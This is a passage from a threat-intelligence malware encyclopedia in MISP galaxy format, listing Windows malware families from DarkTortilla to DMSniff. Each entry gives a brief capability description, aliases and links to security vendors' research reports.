DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks® Counter Threat Unit™ (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.

From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.

The tag is: misp-galaxy:malpedia="DarkTortilla"

DarkTortilla is also known as:

Table 3301. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

https://www.secureworks.com/research/darktortilla-malware-analysis

Darktrack RAT

According to PCrisk, DarkTrack is a malicious program classified as a Remote Access Trojan (RAT). This type of malware enables remote access to and control over an infected device. The level of control these programs have varies; however, some allow user-level manipulation of the affected machine.

The functionality of RATs likewise varies, and so does the scope of potential misuse. DarkTrack has a broad range of functions and capabilities, which make this trojan a highly dangerous piece of software.

The tag is: misp-galaxy:malpedia="Darktrack RAT"

Darktrack RAT is also known as:

Table 3302. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat

https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf

https://www.tgsoft.it/files/report/download.asp?id=7481257469

https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html

https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1

http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml

https://www.facebook.com/darktrackrat/

DarkVNC

According to Enigmasoft, DarkVNC malware is a hacking tool that is available for purchase online. It can be used as a Virtual Network Computing service, which means that the attackers can get full access to the targeted system via this malware. However, unlike a genuine Virtual Network Computing utility, the DarkVNC threat operates silently in the background. Therefore, it is highly likely that the victims will not notice that their systems have been compromised.

The tag is: misp-galaxy:malpedia="DarkVNC"

DarkVNC is also known as:

Table 3303. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc

https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884

https://isc.sans.edu/diary/rss/28934

https://reaqta.com/2017/11/short-journey-darkvnc/

DataExfiltrator

The tag is: misp-galaxy:malpedia="DataExfiltrator"

DataExfiltrator is also known as:

  • FileSender

Table 3305. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.data_exfiltrator

https://blog.reversinglabs.com/blog/data-exfiltrator

DBoxAgent

This malware uses Dropbox as its C&C channel.

The tag is: misp-galaxy:malpedia="DBoxAgent"

DBoxAgent is also known as:

Table 3309. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dboxagent

https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf

DcDcrypt

Ransomware written in .NET.

The tag is: misp-galaxy:malpedia="DcDcrypt"

DcDcrypt is also known as:

Table 3310. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dcdcrypt

https://labs.k7computing.com/index.php/dcdcrypt-ransomware-decryptor/

DCRat

DCRat is a typical RAT that has been around since at least June 2019.

The tag is: misp-galaxy:malpedia="DCRat"

DCRat is also known as:

  • DarkCrystal RAT

Table 3311. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

https://www.zscaler.com/blogs/security-research/freecryptoscam-new-cryptocurrency-scam-leads-installation-backdoors-and

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://community.riskiq.com/article/50c77491

https://www.youtube.com/watch?v=ElqmQDySy48

https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://muha2xmad.github.io/malware-analysis/dcrat/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf

https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

https://blogs.infoblox.com/cyber-threat-intelligence/cyber-campaign-briefs/malspam-campaign-delivers-dark-crystal-rat-dcrat/

https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://embee-research.ghost.io/dcrat-manual-de-obfuscation/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/

https://cert.gov.ua/article/405538

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time

https://cert.gov.ua/article/160530

https://forensicitguy.github.io/snip3-crypter-dcrat-vbs/

https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains

DCSrv

A ransomware as used by MosesStaff, built around the DiskCryptor tool.

The tag is: misp-galaxy:malpedia="DCSrv"

DCSrv is also known as:

  • DCrSrv

Table 3312. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dcsrv

https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/

DDKeylogger

The tag is: misp-galaxy:malpedia="DDKeylogger"

DDKeylogger is also known as:

Table 3313. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkeylogger

https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

dearcry

According to PCrisk, DearCry ransomware has been observed infecting systems via ProxyLogon vulnerabilities of Microsoft Exchange servers - mail and calendaring servers developed by Microsoft. While a patch has been released addressing these vulnerabilities, thousands of Microsoft Exchange servers remained unpatched at the time of research.

The tag is: misp-galaxy:malpedia="dearcry"

dearcry is also known as:

  • DoejoCrypt

Table 3317. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dearcry

https://www.youtube.com/watch?v=Hhx9Q2i7zGo

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b

https://www.youtube.com/watch?v=MRTdGUy1lfw

https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities

https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf

https://www.youtube.com/watch?v=qmCjtigVVR0

https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s

DECAF

Ransomware written in Go.

The tag is: misp-galaxy:malpedia="DECAF"

DECAF is also known as:

Table 3319. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.decaf

https://blog.morphisec.com/decaf-ransomware-a-new-golang-threat-makes-its-appearance

DeepRAT

The tag is: misp-galaxy:malpedia="DeepRAT"

DeepRAT is also known as:

Table 3322. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deep_rat

https://twitter.com/benkow_/status/1415797114794397701

Defray

Defray is targeted ransomware that appeared in 2017, aimed mainly at the healthcare vertical.

The distribution of Defray has several notable characteristics. According to Proofpoint:

  • Defray is currently being spread via Microsoft Word document attachments in email

  • The campaigns are as small as several messages each

  • The lures are custom crafted to appeal to the intended set of potential victims

  • The recipients are individuals or distribution lists, e.g., group@ and websupport@

  • Geographic targeting is in the UK and US

  • Vertical targeting varies by campaign and is narrow and selective

The tag is: misp-galaxy:malpedia="Defray"

Defray is also known as:

  • Glushkov

Table 3323. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.defray

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/

https://www.secureworks.com/research/threat-profiles/gold-dupont

https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3

https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/

https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html

Deimos

Described by Elastic as being associated with win.jupyter, and being used in the context of initial access, persistence, and C&C capabilities.

The tag is: misp-galaxy:malpedia="Deimos"

Deimos is also known as:

Table 3324. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deimos

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://www.elastic.co/blog/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant

DeimosC2

Trend Micro describes DeimosC2 as an open-source C&C framework that was released in June 2020. It is a fully-functional framework that allows for multiple attackers to access, create payloads for, and interact with victim computers. As a post-exploitation C&C framework, DeimosC2 will generate the payloads that need to be manually executed on computer servers that have been compromised through other means such as social engineering, exploitation, or brute-force attacks. Once it is deployed, the threat actors will gain the same access to the systems as the user account that the payload was executed as, either as an administrator or a regular user. Note that DeimosC2 does not perform active or privilege escalation of any kind.

The tag is: misp-galaxy:malpedia="DeimosC2"

DeimosC2 is also known as:

Table 3325. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deimos_c2

https://www.trendmicro.com/en_us/research/22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html

https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf

https://censys.com/russian-ransomware-c2-network-discovered-in-censys-data/

DeliveryCheck

According to CERT-UA, this malware makes use of XSLT (Extensible Stylesheet Language Transformations) and COM hijacking. Its distinguishing feature is a server component, usually installed on compromised MS Exchange servers in the form of a MOF (Managed Object Format) file using the Desired State Configuration (DSC) PowerShell tool, effectively turning a legitimate server into a malware control center.

The tag is: misp-galaxy:malpedia="DeliveryCheck"

DeliveryCheck is also known as:

  • CAPIBAR

  • GAMEDAY

Table 3326. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.delivery_check

https://twitter.com/msftsecintel/status/1681695399084539908

https://cert.gov.ua/article/5213167

Delta(Alfa,Bravo, …​)

The tag is: misp-galaxy:malpedia="Delta(Alfa,Bravo, …​)"

Delta(Alfa,Bravo, …​) is also known as:

Table 3327. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas

DeltaStealer

Rust-based infostealer.

The tag is: misp-galaxy:malpedia="DeltaStealer"

DeltaStealer is also known as:

Table 3328. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deltastealer

https://www.trendmicro.com/en_us/research/23/e/rust-based-info-stealers-abuse-github-codespaces.html

Dented

Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse SOCKS5, Tor and VNC modules can be added.

The tag is: misp-galaxy:malpedia="Dented"

Dented is also known as:

Table 3329. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dented

Deprimon

According to ESET Research, DePriMon is a malicious downloader with several stages that uses many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor, a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledge base. For that, the malware uses the “Windows Default Print Monitor” name; that is why ESET named it DePriMon. Due to its complexity and modular architecture, researchers believe it to be a framework.

DePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.

The tag is: misp-galaxy:malpedia="Deprimon"

Deprimon is also known as:

Table 3330. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deprimon

https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/

DeriaLock

The tag is: misp-galaxy:malpedia="DeriaLock"

DeriaLock is also known as:

Table 3332. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock

https://twitter.com/struppigel/status/812601286088597505

DeroHE

DeroHE is a ransomware that was spread to users after IObit, a Windows utility developer, was hacked. The malware is delivered as a DLL that is sideloaded by a legitimate, signed IObit License Manager application.

The tag is: misp-galaxy:malpedia="DeroHE"

DeroHE is also known as:

Table 3333. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.derohe

https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/

Derusbi (Windows)

A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.

The tag is: misp-galaxy:malpedia="Derusbi (Windows)"

Derusbi (Windows) is also known as:

  • PHOTO

Table 3334. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi

https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://attack.mitre.org/groups/G0096

http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf

https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf

https://www.secureworks.com/research/threat-profiles/bronze-keystone

https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/

https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf

https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family

https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html

https://www.secureworks.com/research/threat-profiles/bronze-firestone

https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/

https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html

https://attack.mitre.org/groups/G0001/

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf

https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/

DesertBlade

According to Microsoft, this was used in a limited destructive malware attack in early March 2022 impacting a single Ukrainian entity. DesertBlade is responsible for iteratively overwriting and then deleting overwritten files on all accessible drives (sparing the system if it is a domain controller).

The tag is: misp-galaxy:malpedia="DesertBlade"

DesertBlade is also known as:

Table 3335. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.desertblade

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

Devil’s Rat

The tag is: misp-galaxy:malpedia="Devil’s Rat"

Devil’s Rat is also known as:

Table 3336. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat

Dexbia

The tag is: misp-galaxy:malpedia="Dexbia"

Dexbia is also known as:

  • CONIME

Table 3338. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia

https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf

Dexphot

Dexphot is cryptomining malware that attacks Windows machines to profit from their resources. It implements many techniques to evade common security systems and uses fileless techniques to inject its malicious behavior. According to Microsoft, Dexphot hijacks legitimate system processes to disguise malicious activity. If not stopped, Dexphot also installs monitoring services and scheduled tasks that trigger re-infection when defenders attempt to remove the malware.

The tag is: misp-galaxy:malpedia="Dexphot"

Dexphot is also known as:

Table 3339. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dexphot

https://www.microsoft.com/security/blog/2019/11/26/insights-from-one-year-of-tracking-a-polymorphic-threat/

Dexter

Dexter is point-of-sale (PoS) malware that infects computers running Microsoft Windows; it was discovered by IT security firm Seculert in December 2012. It infects PoS systems worldwide and steals sensitive information such as credit card and debit card data.

The tag is: misp-galaxy:malpedia="Dexter"

Dexter is also known as:

  • LusyPOS

Table 3340. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter

https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html

https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html

https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware—​Getting-Your-Hands-Dirty/

http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html

https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/

Dharma

According to MalwareBytes, the Dharma Ransomware family is installed manually by attackers hacking into computers over Remote Desktop Protocol Services (RDP). The attackers will scan the Internet for computers running RDP, usually on TCP port 3389, and then attempt to brute force the password for the computer.

Once they gain access to the computer they will install the ransomware and let it encrypt the computer. If the attackers are able to encrypt other computers on the network, they will attempt to do so as well.

The tag is: misp-galaxy:malpedia="Dharma"

Dharma is also known as:

  • Arena

  • Crysis

  • Wadhrama

  • ncov

Table 3341. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma

https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware

https://securelist.com/cis-ransomware/104452/

https://twitter.com/JakubKroustek/status/1087808550309675009

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://www.vice.com/en/article/wxqz54/secret-service-network-investigative-technique-ransomware

https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/

https://www.theregister.com/2019/11/11/dharma_decryption_promises_data_recovery/

https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/

https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure

http://web.archive.org/web/20191008053714/http://esec-lab.sogeti.com/posts/2016/06/07/the-story-of-yet-another-ransomfailware.html

https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/

https://www.justice.gov/usao-dc/press-release/file/1021186/download

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://asec.ahnlab.com/en/54937/

https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/

https://s3.documentcloud.org/documents/6986753/Secret-Service-Seattle-NIT-Warrant-Application.pdf

https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une

https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://news.sophos.com/en-us/2020/08/12/color-by-numbers-inside-a-dharma-ransomware-as-a-service-attack/

https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware

https://www.acronis.com/en-us/articles/Dharma-ransomware/

https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/

https://www.group-ib.com/media/iran-cybercriminals/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://research.checkpoint.com/2018/the-ransomware-doctor-without-a-cure/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

DiamondFox

According to PCrisk, DiamondFox is highly modular malware offered as malware-as-a-service, and is for sale on various hacker forums. Therefore, cyber criminals who are willing to use DiamondFox do not necessarily require any technical knowledge to perform their attacks.

Once purchased, this malware can be used to log keystrokes, steal credentials (e.g., usernames, email addresses, passwords), hijack cryptocurrency wallets, perform distributed denial of service (DDoS) attacks, and to carry out other malicious tasks.

DiamondFox allows cyber criminals to choose which plug-ins to keep activated and see infection statistics in real-time.

The tag is: misp-galaxy:malpedia="DiamondFox"

DiamondFox is also known as:

  • Crystal

  • Gorynch

  • Gorynych

Table 3342. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox

https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/

https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced

https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF

https://www.scmagazine.com/inside-diamondfox/article/578478/

https://blog.cylance.com/a-study-in-bots-diamondfox

http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/

DICELOADER

A RAT written in .NET, used by FIN7 since 2021. In some instances dropped by ps1.powertrash.

The tag is: misp-galaxy:malpedia="DICELOADER"

DICELOADER is also known as:

  • Lizar

Table 3344. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.diceloader

https://www.mandiant.com/resources/blog/evolution-of-fin7

https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319

DILLJUICE

APT10’s fork of the (open-source) Quasar RAT.

The tag is: misp-galaxy:malpedia="DILLJUICE"

DILLJUICE is also known as:

Table 3345. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dilljuice

https://securelist.com/apt-trends-report-q1-2021/101967/

https://threatvector.cylance.com/en_us/home/threat-spotlight-menupass-quasarrat-backdoor.html

DilongTrash

Downloader.

The tag is: misp-galaxy:malpedia="DilongTrash"

DilongTrash is also known as:

Table 3346. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dilongtrash

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

Dimnie

The tag is: misp-galaxy:malpedia="Dimnie"

Dimnie is also known as:

Table 3347. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie

http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/

DinodasRAT

The tag is: misp-galaxy:malpedia="DinodasRAT"

DinodasRAT is also known as:

Table 3348. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dinodas_rat

https://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/

DinoTrain

Downloader.

The tag is: misp-galaxy:malpedia="DinoTrain"

DinoTrain is also known as:

Table 3349. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dinotrain

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

DirCrypt

The tag is: misp-galaxy:malpedia="DirCrypt"

DirCrypt is also known as:

Table 3350. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt

https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/

Disk Knight

The tag is: misp-galaxy:malpedia="Disk Knight"

Disk Knight is also known as:

Table 3352. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.disk_knight

https://www.lucadamico.dev/papers/malware_analysis/DiskKnight.pdf

DispenserXFS

The tag is: misp-galaxy:malpedia="DispenserXFS"

DispenserXFS is also known as:

Table 3354. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs

https://twitter.com/cyb3rops/status/1101138784933085191

DistTrack

The tag is: misp-galaxy:malpedia="DistTrack"

DistTrack is also known as:

  • Shamoon

Table 3355. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf

http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html

https://securelist.com/shamoon-the-wiper-copycats-at-work/

https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis

https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon

https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/

http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf

https://content.fireeye.com/m-trends/rpt-m-trends-2017

https://malwareindepth.com/shamoon-2012/

https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail

https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon

https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/

DLRAT

The tag is: misp-galaxy:malpedia="DLRAT"

DLRAT is also known as:

Table 3358. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dlrat

https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/

DMSniff

DMSniff is a point-of-sale malware previously only privately sold. It has been used in breaches of small- and medium-sized businesses in the restaurant and entertainment industries. It uses a domain generation algorithm (DGA) to create lists of command-and-control domains on the fly.

The tag is: misp-galaxy:malpedia="DMSniff"

DMSniff is also known as:

Table 3360. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff

https://www.flashpoint-intel.com/blog/dmsniff-pos-malware-actively-leveraged-target-medium-sized-businesses/

https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d

DneSpy

